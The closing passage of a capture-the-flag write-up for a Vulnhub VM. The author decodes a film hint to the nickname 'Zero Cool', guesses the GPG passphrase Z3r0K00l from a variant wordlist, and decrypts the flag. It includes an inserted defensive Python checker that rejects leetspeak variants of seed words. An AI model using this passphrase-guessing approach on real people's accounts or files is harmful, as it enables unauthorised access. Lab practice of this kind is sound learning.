-rw-r--r-- 1 root root 320130 Sep  7  2015 LeithCentralStation.jpg

I check the hint.txt file and this is what I find:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cat hint.txt 
http://www.imdb.com/title/tt0117951/ and
http://www.imdb.com/title/tt0113243/ have
someone in common... Can you remember his
original nom de plume in 1988...?

The only person these two films have in common is Jonny Lee Miller. I check his Wikipedia page and I see that his nom de plume (or nickname) was Zero Cool. I try to decrypt the file flag.txt.gpg using the passphrase zerocool, but it doesn’t work. After various attempts, I create a wordlist with all the possible variations of the word zerocool, and in the end the right passphrase turns out to be Z3r0K00l:
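The passphrase was a one-substitution disguise of the word the hint pointed at, and a password policy can reject that class before it is ever set. The following is an added example, not the write-up's own code: it undoes leetspeak and phonetic substitutions, then measures the edit distance from the normalised candidate to each seed word (here the hint word zerocool; the denylist, which includes the page's "god", and the minimum length are constructed for the example). Function and constant names are this example's.

```python
# Seeds and thresholds constructed for the example: the hint word from this
# VM, a small denylist (the write-up's "god" among them) and a length floor.
SEED_WORDS = ["zerocool"]
DENYLIST = {"god", "password", "123456"}
MIN_LENGTH = 12

# digit/symbol -> letter substitutions that leetspeak passwords rely on
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i", "+": "t"})


def normalise(word):
    """Undo leet substitutions and common phonetic respellings (k/c, z/s, ph/f)."""
    w = word.lower().translate(LEET)
    return w.replace("ph", "f").replace("k", "c").replace("z", "s")


def edit_distance(a, b):
    """Levenshtein distance by plain dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def near_variant_of(candidate, seeds, max_distance=1):
    """Return the seed the candidate is a disguised form of, else None."""
    norm = normalise(candidate)
    for seed in seeds:
        s = normalise(seed)
        if edit_distance(norm, s) <= max_distance:
            return seed
        if len(s) >= 6 and s in norm:        # seed padded with a year or suffix
            return seed
    return None


def check_passphrase(candidate, seeds=SEED_WORDS, denylist=DENYLIST):
    """Return a rejection reason, or None if the passphrase passes."""
    if candidate.lower() in denylist:
        return "denylisted"
    seed = near_variant_of(candidate, seeds)
    if seed:
        return "variant of %s" % seed
    if len(candidate) < MIN_LENGTH:
        return "shorter than %d characters" % MIN_LENGTH
    return None


if __name__ == "__main__":
    for pw in ("Z3r0K00l", "zerocool1988", "god", "correct horse battery staple"):
        print("%-30s -> %s" % (pw, check_passphrase(pw) or "ok"))
```

The seed list is the part that does the work: anything an attacker can read off the target (hostnames, usernames, the film references in this VM's hints) belongs in it, because normalising and comparing is far cheaper for a defender than the guessing is for the attacker.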

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121/.trash# gpg --decrypt flag.txt.gpg 
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
 _   _            _      _____ _             ____  _                  _   _
| | | | __ _  ___| | __ |_   _| |__   ___   |  _ \| | __ _ _ __   ___| |_| |
| |_| |/ _` |/ __| |/ /   | | | '_ \ / _ \  | |_) | |/ _` | '_ \ / _ \ __| |
|  _  | (_| | (__|   <    | | | | | |  __/  |  __/| | (_| | | | |  __/ |_|_|
|_| |_|\__,_|\___|_|\_\   |_| |_| |_|\___|  |_|   |_|\__,_|_| |_|\___|\__(_)


Should you not be standing in a 360 degree rotating payphone when reading
this flag...? B-)

Anyhow, congratulations once more on rooting this VM. This time things were
a bit esoteric, but I hope you enjoyed it all the same.

Shout-outs again to #vulnhub for hosting a great learning tool. A special
thanks goes to g0blin and GKNSB for testing, and to g0tM1lk for the offer
to host the CTF once more.
                                                              --Knightmare
gpg: WARNING: message was not integrity protected

Nice one, it was very original, I loved it. Thank you to Knightmare for the VM and to Vulnhub for hosting it. If you have any questions or remarks, please do not hesitate to leave a comment.